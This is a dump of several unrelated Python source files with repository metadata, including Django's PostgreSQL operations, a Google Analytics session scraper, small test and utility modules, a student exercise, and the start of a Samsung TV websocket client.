        else:
            return "EXTRACT('%s' FROM %s)" % (lookup_type, field_name)
    def date_trunc_sql(self, lookup_type, field_name):
        # http://www.postgresql.org/docs/current/static/functions-datetime.html#FUNCTIONS-DATETIME-TRUNC
        return "DATE_TRUNC('%s', %s)" % (lookup_type, field_name)
    def _convert_field_to_tz(self, field_name, tzname):
        # Only apply AT TIME ZONE when timezone support is enabled; tzname is
        # returned as a query parameter rather than interpolated into the SQL.
        if settings.USE_TZ:
            field_name = "%s AT TIME ZONE %%s" % field_name
            params = [tzname]
        else:
            params = []
        return field_name, params
    def datetime_cast_date_sql(self, field_name, tzname):
        field_name, params = self._convert_field_to_tz(field_name, tzname)
        sql = '(%s)::date' % field_name
        return sql, params
    def datetime_extract_sql(self, lookup_type, field_name, tzname):
        field_name, params = self._convert_field_to_tz(field_name, tzname)
        sql = self.date_extract_sql(lookup_type, field_name)
        return sql, params
    def datetime_trunc_sql(self, lookup_type, field_name, tzname):
        field_name, params = self._convert_field_to_tz(field_name, tzname)
        # http://www.postgresql.org/docs/current/static/functions-datetime.html#FUNCTIONS-DATETIME-TRUNC
        sql = "DATE_TRUNC('%s', %s)" % (lookup_type, field_name)
        return sql, params
    def deferrable_sql(self):
        return " DEFERRABLE INITIALLY DEFERRED"
    def fetch_returned_insert_ids(self, cursor):
        """
        Given a cursor object that has just performed an INSERT...RETURNING
        statement into a table that has an auto-incrementing ID, return the
        list of newly created IDs.
        """
        return [item[0] for item in cursor.fetchall()]
    def lookup_cast(self, lookup_type, internal_type=None):
        lookup = '%s'
        # Cast text lookups to text to allow things like filter(x__contains=4)
        if lookup_type in ('iexact', 'contains', 'icontains', 'startswith',
                           'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
            if internal_type in ('IPAddressField', 'GenericIPAddressField'):
                lookup = "HOST(%s)"
            else:
                lookup = "%s::text"
        # Use UPPER(x) for case-insensitive lookups; it's faster.
        if lookup_type in ('iexact', 'icontains', 'istartswith', 'iendswith'):
            lookup = 'UPPER(%s)' % lookup
        return lookup
    def last_insert_id(self, cursor, table_name, pk_name):
        # Use pg_get_serial_sequence to get the underlying sequence name
        # from the table name and column name (available since PostgreSQL 8)
        cursor.execute("SELECT CURRVAL(pg_get_serial_sequence('%s','%s'))" % (
            self.quote_name(table_name), pk_name))
        return cursor.fetchone()[0]
    def no_limit_value(self):
        # None signals that no LIMIT clause is needed to mean "no limit".
        return None
    def prepare_sql_script(self, sql):
        # The script is passed through unsplit, as a single statement batch.
        return [sql]
    def quote_name(self, name):
        if name.startswith('"') and name.endswith('"'):
            return name  # Quoting once is enough.
        return '"%s"' % name
    def set_time_zone_sql(self):
        return "SET TIME ZONE %s"
    def sql_flush(self, style, tables, sequences, allow_cascade=False):
        if tables:
            # Perform a single SQL 'TRUNCATE x, y, z...;' statement. It allows
            # us to truncate tables referenced by a foreign key in any other
            # table.
            tables_sql = ', '.join(
                style.SQL_FIELD(self.quote_name(table)) for table in tables)
            if allow_cascade:
                sql = ['%s %s %s;' % (
                    style.SQL_KEYWORD('TRUNCATE'),
                    tables_sql,
                    style.SQL_KEYWORD('CASCADE'),
                )]
            else:
                sql = ['%s %s;' % (
                    style.SQL_KEYWORD('TRUNCATE'),
                    tables_sql,
                )]
            sql.extend(self.sequence_reset_by_name_sql(style, sequences))
            return sql
        else:
            return []
    def sequence_reset_by_name_sql(self, style, sequences):
        # 'ALTER SEQUENCE sequence_name RESTART WITH 1;'... style SQL statements
        # to reset sequence indices
        sql = []
        for sequence_info in sequences:
            table_name = sequence_info['table']
            column_name = sequence_info['column']
            if not (column_name and len(column_name) > 0):
                # This will be the case if it's an m2m using an autogenerated
                # intermediate table (see BaseDatabaseIntrospection.sequence_list)
                column_name = 'id'
            sql.append("%s setval(pg_get_serial_sequence('%s','%s'), 1, false);" %
                       (style.SQL_KEYWORD('SELECT'),
                        style.SQL_TABLE(self.quote_name(table_name)),
                        style.SQL_FIELD(column_name))
                       )
        return sql
    def tablespace_sql(self, tablespace, inline=False):
        if inline:
            return "USING INDEX TABLESPACE %s" % self.quote_name(tablespace)
        else:
            return "TABLESPACE %s" % self.quote_name(tablespace)
    def sequence_reset_sql(self, style, model_list):
        from django.db import models
        output = []
        qn = self.quote_name
        for model in model_list:
            # Use `coalesce` to set the sequence for each model to the max pk value if there are records,
            # or 1 if there are none. Set the `is_called` property (the third argument to `setval`) to true
            # if there are records (as the max pk value is already in use), otherwise set it to false.
            # Use pg_get_serial_sequence to get the underlying sequence name from the table name
            # and column name (available since PostgreSQL 8)
            for f in model._meta.local_fields:
                if isinstance(f, models.AutoField):
                    output.append(
                        "%s setval(pg_get_serial_sequence('%s','%s'), "
                        "coalesce(max(%s), 1), max(%s) %s null) %s %s;" % (
                            style.SQL_KEYWORD('SELECT'),
                            style.SQL_TABLE(qn(model._meta.db_table)),
                            style.SQL_FIELD(f.column),
                            style.SQL_FIELD(qn(f.column)),
                            style.SQL_FIELD(qn(f.column)),
                            style.SQL_KEYWORD('IS NOT'),
                            style.SQL_KEYWORD('FROM'),
                            style.SQL_TABLE(qn(model._meta.db_table)),
                        )
                    )
                    break  # Only one AutoField is allowed per model, so don't bother continuing.
            for f in model._meta.many_to_many:
                if not f.remote_field.through:
                    output.append(
                        "%s setval(pg_get_serial_sequence('%s','%s'), "
                        "coalesce(max(%s), 1), max(%s) %s null) %s %s;" % (
                            style.SQL_KEYWORD('SELECT'),
                            style.SQL_TABLE(qn(f.m2m_db_table())),
                            style.SQL_FIELD('id'),
                            style.SQL_FIELD(qn('id')),
                            style.SQL_FIELD(qn('id')),
                            style.SQL_KEYWORD('IS NOT'),
                            style.SQL_KEYWORD('FROM'),
                            style.SQL_TABLE(qn(f.m2m_db_table()))
                        )
                    )
        return output
    def prep_for_iexact_query(self, x):
        return x
    def max_name_length(self):
        """
        Returns the maximum length of an identifier.
        Note that the maximum length of an identifier is 63 by default, but can
        be changed by recompiling PostgreSQL after editing the NAMEDATALEN
        macro in src/include/pg_config_manual.h .
        This implementation simply returns 63, but can easily be overridden by a
        custom database backend that inherits most of its behavior from this one.
        """
        return 63
    def distinct_sql(self, fields):
        if fields:
            return 'DISTINCT ON (%s)' % ', '.join(fields)
        else:
            return 'DISTINCT'
    def last_executed_query(self, cursor, sql, params):
        # http://initd.org/psycopg/docs/cursor.html#cursor.query
        # The query attribute is a Psycopg extension to the DB API 2.0.
        if cursor.query is not None:
            return cursor.query.decode('utf-8')
        return None
    def return_insert_id(self):
        return "RETURNING %s", ()
    def bulk_insert_sql(self, fields, placeholder_rows):
        # Build a single "VALUES (..), (..), ..." clause from per-row
        # placeholder lists.
        placeholder_rows_sql = (", ".join(row) for row in placeholder_rows)
        values_sql = ", ".join("(%s)" % sql for sql in placeholder_rows_sql)
        return "VALUES " + values_sql
    def adapt_datefield_value(self, value):
        return value
    def adapt_datetimefield_value(self, value):
        return value
    def adapt_timefield_value(self, value):
        return value
    def adapt_ipaddressfield_value(self, value):
        # Wrap non-empty values so psycopg2 sends them as the inet type.
        if value:
            return Inet(value)
        return None
    def subtract_temporals(self, internal_type, lhs, rhs):
        if internal_type == 'DateField':
            lhs_sql, lhs_params = lhs
            rhs_sql, rhs_params = rhs
            return "age(%s, %s)" % (lhs_sql, rhs_sql), lhs_params + rhs_params
        return super(DatabaseOperations, self).subtract_temporals(internal_type, lhs, rhs)
| [
"smileszzh@163.com"
] | smileszzh@163.com |
ab523c3751accac0cb2820f8f76621d3ca5474ab | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_172/ch88_2020_05_06_12_07_01_120079.py | 65c8bdbe203ac21abf9a6631e62483803e27d184 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | class Retangulo:
def _init_(self,coord1, coord2):
coord1 = Ponto(x1, y1)
coord2 = Ponto(x2, y2)
def calcula_perimetro(self):
base = x2 - x1
altura = y2 - y1
p = 2*base + 2*altura
def calcula_area(self):
base = x2 - x1
altura = y2 - y1
a = base*altura | [
"you@example.com"
] | you@example.com |
bdd9f479c4b2fdd3901be2b45127d857c7560c00 | 60b1c5ab904a773e81d3f817279f9f2f72e15ac6 | /individual.py | be8c4cc2e02443bef755cf708e9a8b67834da694 | [
"MIT"
] | permissive | n0lley/polycube | 1dede161444c9f50220e8683742d95468290bdee | bc97b81b7455a8682fcd83f198fad437bb3dc4cb | refs/heads/master | 2021-08-07T01:09:05.584330 | 2020-07-28T23:18:28 | 2020-07-28T23:18:28 | 180,885,490 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | py | class INDIVIDUAL:
    def __init__(self, *args, **kwargs):
        # Abstract: concrete individual types must provide their own constructor.
        raise NotImplementedError
    def mutate(self, *args, **kwargs):
        # Abstract: subclasses must override with their mutation operator.
        raise NotImplementedError
    def evaluate(self, *args, **kwargs):
        # Abstract: subclasses must override with their fitness evaluation.
        raise NotImplementedError
"david.matthews.1@uvm.edu"
] | david.matthews.1@uvm.edu |
b779dffe55d8fb13948ccc43312f57df7c9b48af | 987d44772eb85c61deefe2986598903c9e965008 | /_site/site/performance_dashboard/data/GA/GA_scraper.py | 46864696a95d0a3d5b6fe1092f9e2c4dbe8719fb | [] | no_license | casten4congress/casten4congress.github.io | 40e92ac86088c941f9180839e6e1b1b8cf3fb837 | 456caaf8503ed63a7903ccf9dc19d23c914a1ca1 | refs/heads/master | 2020-03-12T17:32:29.826443 | 2018-07-17T20:39:41 | 2018-07-17T20:39:41 | 130,738,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,429 | py | import json
from apiclient.discovery import build
from oauth2client.service_account import ServiceAccountCredentials
municipalities_list = ['Bartlett', 'Palatine', 'Lisle', 'Lakewood', 'Winfield', 'Carol Stream', 'Downers Grove', 'Westmont', 'Kildeer', 'Glen Ellyn', 'Burr Ridge', 'Long Grove', 'Barrington Hills', 'Wayne', 'Naperville', 'Forest Lake', 'Trout Valley', 'Rolling Meadows', 'Inverness', 'Clarendon Hills', 'St. Charles', 'South Barrington', 'Deer Park', 'Algonquin', 'Hoffman Estates', 'Wheaton', 'Lombard', 'Lake Zurich', 'Port Barrington', 'Hawthorn Woods', 'East Dundee', 'Fox River Grove', 'Lake in the Hills', 'Crystal Lake', 'Darien', 'Oakwood Hills', 'West Dundee', 'Oakbrook Terrace', 'Sleepy Hollow', 'Hinsdale', 'South Elgin', 'Lake Barrington', 'Gilberts', 'Tower Lakes', 'Cary', 'Willowbrook', 'North Barrington', 'Carpentersville', 'Oak Brook', 'Warrenville', 'Elgin', 'Willowbrook', 'West Chicago', 'Barrington']
SCOPES = ['https://www.googleapis.com/auth/analytics.readonly']
SERVICE_ACCOUNT_EMAIL = 'ejerzyk@phonic-server-203118.iam.gserviceaccount.com'
KEY_FILE_LOCATION = 'client_secrets.json'
VIEW_ID = '154261248'
def initialize_analyticsreporting():
    """Initializes an Analytics Reporting API V4 service object.

    Authenticates with the service-account key file named by
    KEY_FILE_LOCATION, restricted to the read-only scope in SCOPES.

    Returns:
        An authorized Analytics Reporting API V4 service object.
    """
    credentials = ServiceAccountCredentials.from_json_keyfile_name(
        KEY_FILE_LOCATION, SCOPES)
    # Build the service object.
    analytics = build('analyticsreporting', 'v4', credentials=credentials)
    return analytics
def get_report(analytics, dims, dateranges):
    """Queries the Analytics Reporting API V4 for session counts.

    Args:
        analytics: An authorized Analytics Reporting API V4 service object.
        dims: list of dimension dicts, e.g. [{'name': 'ga:city'}].
        dateranges: list of {'startDate': ..., 'endDate': ...} dicts.

    Returns:
        The Analytics Reporting API V4 response.
    """
    # NOTE(review): dims is already a list, so [dims] sends a nested list as
    # "dimensions"; the callers in this file rely on the current behaviour —
    # confirm against the API before changing.
    return analytics.reports().batchGet(
        body={
            'reportRequests': [
                {
                    'viewId': VIEW_ID,
                    'dateRanges': dateranges,
                    'metrics': [{'expression': 'ga:sessions'}],
                    'dimensions': [dims]
                }]
        }
    ).execute()
def print_response(response):
    """Parse a GA Reporting API v4 response into per-municipality session data.

    Prints each dimension as it is parsed, and returns a dict keyed by
    municipality name. Depending on which dimensions the report carried, each
    value is either a bare session count, or nested dicts keyed by age
    bracket and/or gender.

    Fixes vs. the original:
      * row state (city/age/gender) is reset for every row — previously a
        non-municipality row following a municipality row was credited to
        that earlier municipality;
      * results accumulate across reports and {} is returned when there are
        no reports (previously `to_return` was reset per report and undefined
        with zero reports);
      * storing a second age bracket no longer clobbers the first one.
    """
    to_return = {}
    for report in response.get('reports', []):
        columnHeader = report.get('columnHeader', {})
        dimensionHeaders = columnHeader.get('dimensions', [])
        metricHeaders = columnHeader.get('metricHeader', {}).get('metricHeaderEntries', [])
        for row in report.get('data', {}).get('rows', []):
            # Per-row state only.
            mun = ''
            age = ''
            gen = ''
            in_district = False
            dimensions = row.get('dimensions', [])
            dateRangeValues = row.get('metrics', [])
            for header, dimension in zip(dimensionHeaders, dimensions):
                print(header + ": " + dimension)
                if header == 'ga:city' and dimension in municipalities_list:
                    mun = dimension
                    in_district = True
                elif header == 'ga:userGender':
                    gen = dimension
                elif header == 'ga:userAgeBracket':
                    age = dimension
            if not in_district:
                # Skip rows for cities outside the district.
                continue
            for values in dateRangeValues:
                for metricHeader, value in zip(metricHeaders, values.get('values')):
                    value = int(value)
                    if age and gen:
                        to_return.setdefault(mun, {}).setdefault(age, {})[gen] = value
                    elif gen:
                        to_return.setdefault(mun, {})[gen] = value
                    elif age:
                        to_return.setdefault(mun, {})[age] = value
                    else:
                        to_return[mun] = value
    return to_return
def LA(dateranges):
    """Sessions by city x age bracket, expressed as each city's share of the
    district-wide total per bracket. (Python 2 module: note the print
    statements below.)"""
    analytics = initialize_analyticsreporting()
    response = get_report(analytics, [{'name': 'ga:city'}, {'name':'ga:userAgeBracket'}], dateranges)
    d = print_response(response)
    total_18_24 = 0
    total_25_34 = 0
    total_35_44 = 0
    total_45_54 = 0
    total_55_64 = 0
    total_65 = 0
    # First pass: district-wide totals per age bracket.
    for city in d.keys():
        print city
        total_18_24 += int(d[city].get('18-24',0))
        total_25_34 += int(d[city].get('25-34',0))
        total_35_44 += int(d[city].get('35-44',0))
        total_45_54 += int(d[city].get('45-54',0))
        total_55_64 += int(d[city].get('55-64',0))
        total_65 += int(d[city].get('65+',0))
    # Second pass: convert counts to shares of the bracket total.
    # NOTE(review): raises ZeroDivisionError if a bracket has zero sessions
    # district-wide for the period — confirm that cannot happen.
    for city in d.keys():
        d[city]['18-24'] = float(d[city].get('18-24',0))/total_18_24
        d[city]['25-34'] = float(d[city].get('25-34',0))/total_25_34
        d[city]['35-44'] = float(d[city].get('35-44',0))/total_35_44
        d[city]['45-54'] = float(d[city].get('45-54',0))/total_45_54
        d[city]['55-64'] = float(d[city].get('55-64',0))/total_55_64
        d[city]['65+'] = float(d[city].get('65+',0))/total_65
    # Municipalities with no traffic get explicit zero rows.
    for city in municipalities_list:
        if city not in d.keys():
            d[city] = {}
            d[city]['18-24'] = 0
            d[city]['25-34'] = 0
            d[city]['35-44'] = 0
            d[city]['45-54'] = 0
            d[city]['55-64'] = 0
            d[city]['65+'] = 0
    return d
def LG(dateranges):
    """Location/Gender report: each municipality's share of users per gender.

    Queries Google Analytics for users grouped by city and gender, normalises
    each gender so the values across all cities sum to 1, and fills in zeroes
    for municipalities that returned no data.

    :param dateranges: list of GA date-range dicts ({'startDate', 'endDate'}).
    :return: dict city -> {'female'/'male' -> fraction of that gender's total}.
    """
    analytics = initialize_analyticsreporting()
    response = get_report(
        analytics, [{'name': 'ga:city'}, {'name': 'ga:userGender'}], dateranges)
    d = print_response(response)
    genders = ('female', 'male')
    # Grand total per gender across every city.
    totals = dict.fromkeys(genders, 0)
    for city in d:
        for gender in genders:
            totals[gender] += d[city].get(gender, 0)
    # Normalise; guard empty totals (the original raised ZeroDivisionError).
    for city in d:
        for gender in genders:
            total = totals[gender]
            d[city][gender] = float(d[city].get(gender, 0)) / total if total else 0.0
    # Every known municipality must appear in the output, even without data.
    for city in municipalities_list:
        if city not in d:
            d[city] = dict.fromkeys(genders, 0)
    return d
def L(dateranges):
    """Location report: each municipality's fraction of all users.

    :param dateranges: list of GA date-range dicts ({'startDate', 'endDate'}).
    :return: dict city -> fraction of the grand total (0 for cities with no data).
    """
    analytics = initialize_analyticsreporting()
    response = get_report(analytics, [{'name': 'ga:city'}], dateranges)
    d = print_response(response)
    total = sum(d.values())
    # Normalise; guard an empty report (the original divided by zero).
    for city in d:
        d[city] = float(d[city]) / total if total else 0.0
    # Every known municipality must appear in the output, even without data.
    for city in municipalities_list:
        if city not in d:
            d[city] = 0
    return d
def main():
    """Generate the LA/LG/L report files (<NAME>.js and <NAME>.json).

    For each report a JS file (``var <name> = <json>;``) and a raw JSON file
    are written for three trailing periods (1 month, 3 months, 1 year).
    """
    periods = {
        '1mo': [{'startDate': '2018-04-08', 'endDate': 'today'}],
        '3mo': [{'startDate': '2018-02-08', 'endDate': 'today'}],
        '1yr': [{'startDate': '2017-05-08', 'endDate': 'today'}],
    }

    def write_outputs(base_name, var_name, data):
        # The original opened every file and never closed it (and rebound
        # output_f while the previous handle was still open); use context
        # managers so the handles are flushed and released deterministically.
        with open(base_name + '.js', 'w') as output_f:
            output_f.write("var " + var_name + " = " + json.dumps(data) + ";")
        with open(base_name + '.json', 'w') as output_f:
            output_f.write(json.dumps(data))

    for base_name, var_name, report in (('LA', 'la', LA), ('LG', 'lg', LG), ('L', 'l', L)):
        data = {}
        for period, dateranges in periods.items():
            data[period] = report(dateranges)
        write_outputs(base_name, var_name, data)
if __name__ == '__main__':
main()
| [
"ejerzyk@gmail.com"
] | ejerzyk@gmail.com |
b08dd544b2f32a4764ba76171b76226e77090569 | 2628f51ef7ab5aae691dc72556ab312cc5b2a876 | /venv/lib/python3.8/site-packages/unyt/_version.py | c41cbda0701c4538c26555538502bd76e89985b4 | [
"BSD-3-Clause"
] | permissive | Jack-kelly-22/ps-4 | f933a8bb7bf5c865d846a30a5e0c8352c448a18d | fbbf327f1717bbd1902f437147640dfdf6aa118c | refs/heads/master | 2023-02-10T23:56:48.499720 | 2021-01-05T21:43:59 | 2021-01-05T21:43:59 | 327,124,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py |
# This file was generated by 'versioneer.py' (0.18) from
# revision-control system data, or from the parent directory name of an
# unpacked source archive. Distribution tarballs contain a pre-generated copy
# of this file.
import json
version_json = '''
{
"date": "2020-10-05T14:17:00-0600",
"dirty": false,
"error": null,
"full-revisionid": "eeefa00a2fddbf0dba6ab854e968ef43e31f851e",
"version": "v2.8.0"
}
''' # END VERSION_JSON
def get_versions():
    """Return the versioneer version info parsed from the embedded ``version_json``."""
    return json.loads(version_json)
| [
"Jacklaxjk@gmail.com"
] | Jacklaxjk@gmail.com |
0da9380cc1898690b9c39d5b4b7ff4392ed376b1 | 753a03d58940847b76203e39b8cb60d775bc8370 | /test/test_systems_generators_dockerignore.py | d95c632c27a1cd1a45a647dd3008e979abe95f4c | [
"MIT"
] | permissive | SanthoshBala18/skelebot | 912d84abef113f86eeb6b05f50ae9c2bd6115d45 | 13055dba1399b56a76a392699aa0aa259ca916a9 | refs/heads/master | 2020-08-03T15:24:11.105137 | 2019-09-27T15:12:25 | 2019-09-27T15:12:25 | 211,799,653 | 0 | 0 | MIT | 2019-09-30T07:19:27 | 2019-09-30T07:19:27 | null | UTF-8 | Python | false | false | 1,284 | py | from unittest import TestCase
from unittest import mock
import skelebot as sb
import os
class TestDockerignore(TestCase):
    # Absolute path of the repo checkout, captured in setUp before os.getcwd
    # is mocked; config holds the skelebot config loaded inside the test.
    path = ""
    config = None

    # Get the path to the current working directory before we mock the function to do so
    def setUp(self):
        self.path = os.getcwd()

    @mock.patch('os.path.expanduser')
    @mock.patch('os.getcwd')
    def test_buildDockerignore(self, mock_getcwd, mock_expanduser):
        """buildDockerignore regenerates test/files/.dockerignore with the
        ignore patterns taken from the skelebot config."""
        folderPath = "{path}/test/files".format(path=self.path)
        filePath = "{folder}/.dockerignore".format(folder=folderPath)
        # Redirect home-dir and cwd lookups into the test fixture tree.
        mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
        mock_getcwd.return_value = folderPath
        self.config = sb.systems.generators.yaml.loadConfig()
        # Exact expected file body (leading newline is part of the content).
        expected= """
# This dockerignore was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
**/*.zip
**/*.RData
**/*.pkl
**/*.csv
**/*.model
**/*.pyc
"""
        sb.systems.generators.dockerignore.buildDockerignore(self.config)
        data = None
        with open(filePath, "r") as file:
            data = file.read()
        self.assertTrue(data is not None)
        self.assertEqual(data, expected)
if __name__ == '__main__':
    # The module only does ``from unittest import TestCase``/``mock``, so the
    # name ``unittest`` was never bound and the original ``unittest.main()``
    # raised NameError; import the module before using it.
    import unittest
    unittest.main()
| [
"noreply@github.com"
] | SanthoshBala18.noreply@github.com |
b768abfeda8056001f6bd64fe0e1e40d66c85e89 | c7bb49430a2651955e545c3ae4907e870a7f2568 | /patterns/Observer/observer.py | 504ceae4e97e41bceceda740bb0b9bffbce54681 | [] | no_license | jvrcavalcanti/Algorithms | 133dd29d985c41560b212ed1b204d8220bd89bc9 | d83f8e61d959e9da970d6270b373eaea39701927 | refs/heads/master | 2020-12-31T22:34:25.696750 | 2020-06-16T18:25:58 | 2020-06-16T18:25:58 | 239,056,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | from abc import ABC, abstractmethod
class Observer():
    """Observer-pattern participant; concrete observers override handle().

    NOTE(review): the class does not inherit from ABC, so @abstractmethod is
    not actually enforced and Observer remains instantiable — kept as-is to
    preserve current behavior.
    """

    @abstractmethod
    def handle(self, state):
        """React to a state change pushed by the subject."""
        return None
"jonnyvictor01@gmail.com"
] | jonnyvictor01@gmail.com |
f06e6cd20ffd0594a254af576292149542c248bf | 7d57247e1cefc7dfdd4c12a745366fae5e413a11 | /tests/conftest.py | 9731d89f424cc00aa2b48745e73b0a2e2a1149b7 | [
"BSD-2-Clause"
] | permissive | chintal/sphinxcontrib-collations | 6920314dddba4eea7b059028a9cb2c7dba9e3121 | dd2b7f449bf025695fb25a4c685fd3ab9b1c6c53 | refs/heads/master | 2020-06-21T09:12:09.492796 | 2019-07-17T13:14:03 | 2019-07-17T14:22:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | """
pytest config for sphinxcontrib/collations/tests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2017 by Chintalagiri Shashank <shashank.chintalagiri@gmail.com>
:license: BSD, see LICENSE for details.
"""
pytest_plugins = 'sphinx.testing.fixtures'
| [
"shashank.chintalagiri@gmail.com"
] | shashank.chintalagiri@gmail.com |
89a610ca7cd1c5022c19cb112a2eab06b5bf334a | e9b06f7b8b210c550879c1e8c484b42719ccd633 | /custom_components/samsungtv_smart/api/samsungws.py | be8b20e1dd6ee7b4498cd6934fd4be4cf43f6dcf | [] | no_license | eplantequebec/Home-Assistant-Config | a5b69d3e2fa21068dc15b20a8988a24440140300 | ed05566ee476ec4490efa9b9d5bfdf55fca9a808 | refs/heads/master | 2021-08-17T00:11:15.805600 | 2021-07-18T23:40:23 | 2021-07-18T23:40:23 | 201,519,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,202 | py | """
SamsungTVWS - Samsung Smart TV WS API wrapper
Copyright (C) 2019 Xchwarze
Copyright (C) 2020 Ollo69
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
import base64
import json
import logging
import re
import requests
import ssl
import subprocess
import sys
import time
import uuid
import websocket
from datetime import datetime
from enum import Enum
from threading import Thread, Lock
from yarl import URL
from . import exceptions
from . import shortcuts
PING_MATCHER = re.compile(
r"(?P<min>\d+.\d+)\/(?P<avg>\d+.\d+)\/(?P<max>\d+.\d+)\/(?P<mdev>\d+.\d+)"
)
PING_MATCHER_BUSYBOX = re.compile(
r"(?P<min>\d+.\d+)\/(?P<avg>\d+.\d+)\/(?P<max>\d+.\d+)"
)
WIN32_PING_MATCHER = re.compile(r"(?P<min>\d+)ms.+(?P<max>\d+)ms.+(?P<avg>\d+)ms")
MIN_APP_SCAN_INTERVAL = 10
MAX_WS_PING_INTERVAL = 10
TYPE_DEEP_LINK = "DEEP_LINK"
TYPE_NATIVE_LAUNCH = "NATIVE_LAUNCH"
_LOGGING = logging.getLogger(__name__)
def gen_uuid():
    """Return a fresh random UUID (version 4) in its canonical string form."""
    new_id = uuid.uuid4()
    return str(new_id)
class App:
    """Lightweight record for an application installed on the TV.

    app_id:   application id as reported by the TV.
    app_name: human-readable name reported by the TV.
    app_type: numeric type reported by the TV (2 is launched via DEEP_LINK,
              see run_app(); 4 appears to denote a web application — per the
              notes in _get_app_status, to be confirmed).
    """

    def __init__(self, app_id, app_name, app_type):
        self.app_id = app_id
        self.app_name = app_name
        self.app_type = app_type

    def __repr__(self):
        # Added for debuggability; purely additive, no caller depends on it.
        return "App(app_id={!r}, app_name={!r}, app_type={!r})".format(
            self.app_id, self.app_name, self.app_type)
class ArtModeStatus(Enum):
    """State of the TV's "art mode" feature as tracked by SamsungTVWS."""
    Unsupported = 0  # art-mode channel not available on this model
    Unavailable = 1  # supported, but TV unreachable / in standby (see ping_device)
    Off = 2
    On = 3
class Ping:
    """The Class for handling the data retrieval."""

    def __init__(self, host, count):
        """Initialize the data object."""
        self._ip_address = host
        self._count = count
        # NOTE(review): set once here and never updated by ping(); callers
        # must rely on ping()'s return value instead of this attribute.
        self.available = False
        if sys.platform == "win32":
            # Windows ping: -n = echo count, -w = per-reply timeout in ms.
            self._ping_cmd = [
                "ping",
                "-n",
                str(self._count),
                "-w",
                "2000",
                self._ip_address,
            ]
        else:
            # Unix ping: -n numeric output, -q quiet summary, -c count,
            # -W2 = 2 s reply timeout.
            self._ping_cmd = [
                "ping",
                "-n",
                "-q",
                "-c",
                str(self._count),
                "-W2",
                self._ip_address,
            ]

    def ping(self):
        """Send ICMP echo request and return details if success."""
        pinger = subprocess.Popen(
            self._ping_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE
        )
        try:
            out = pinger.communicate()
            _LOGGING.debug("Output is %s", str(out))
            # The rtt values are parsed but discarded: a failed regex match
            # returns None, so .groups() raises AttributeError and the
            # except-branch below turns that into "host unreachable".
            if sys.platform == "win32":
                match = WIN32_PING_MATCHER.search(str(out).split("\n")[-1])
                rtt_min, rtt_avg, rtt_max = match.groups()
            elif "max/" not in str(out):
                # busybox ping summary has only min/avg/max (no mdev).
                match = PING_MATCHER_BUSYBOX.search(str(out).split("\n")[-1])
                rtt_min, rtt_avg, rtt_max = match.groups()
            else:
                match = PING_MATCHER.search(str(out).split("\n")[-1])
                rtt_min, rtt_avg, rtt_max, rtt_mdev = match.groups()
            return True
        except (subprocess.CalledProcessError, AttributeError):
            return False
class SamsungTVWS:
_WS_ENDPOINT_REMOTE_CONTROL = "/api/v2/channels/samsung.remote.control"
_WS_ENDPOINT_APP_CONTROL = "/api/v2"
_WS_ENDPOINT_ART = "/api/v2/channels/com.samsung.art-app"
_REST_URL_FORMAT = "http://{host}:8001/api/v2/{append}"
def __init__(
self,
host,
token=None,
token_file=None,
port=8001,
timeout=None,
key_press_delay=1,
name="SamsungTvRemote",
app_list=None,
):
self.host = host
self.token = token
self.token_file = token_file
self.port = port
self.timeout = None if timeout == 0 else timeout
self.key_press_delay = key_press_delay
self.name = name
self.connection = None
self._app_list = app_list
self._artmode_status = ArtModeStatus.Unsupported
self._power_on_requested = False
self._power_on_requested_time = datetime.min
self._installed_app = {}
self._running_app = None
self._app_type = {}
self._sync_lock = Lock()
self._last_app_scan = datetime.min
self._last_ping = datetime.min
self._is_connected = False
self._ws_remote = None
self._client_remote = None
self._ws_control = None
self._client_control = None
self._ws_art = None
self._client_art = None
self._client_art_supported = 2
self._ping = Ping(self.host, 1)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def _serialize_string(self, string):
if isinstance(string, str):
string = str.encode(string)
return base64.b64encode(string).decode("utf-8")
def _is_ssl_connection(self):
return self.port == 8002
def _format_websocket_url(self, path, is_ssl=False, use_token=True):
scheme = "wss" if is_ssl else "ws"
if is_ssl and use_token:
token = self._get_token()
else:
token = ""
new_uri = URL.build(
scheme=scheme,
host=self.host,
port=self.port,
path=path,
query={"name": self._serialize_string(self.name)}
)
if token:
return str(new_uri.update_query({"token": token}))
return str(new_uri)
def _format_rest_url(self, append=""):
params = {
"host": self.host,
"append": append,
}
return self._REST_URL_FORMAT.format(**params)
def _get_token(self):
if self.token_file is not None:
try:
with open(self.token_file, "r") as token_file:
return token_file.readline()
except:
return ""
else:
return self.token
def _set_token(self, token):
    """Persist a freshly received auth token to the token file, or keep it
    in memory when no token file is configured."""
    _LOGGING.info("New token %s", token)
    if self.token_file is not None:
        # BUG FIX: the original passed ``token`` as an extra argument to a
        # message with no %s placeholder, which makes the logging module
        # raise a string-formatting error whenever debug logging is enabled.
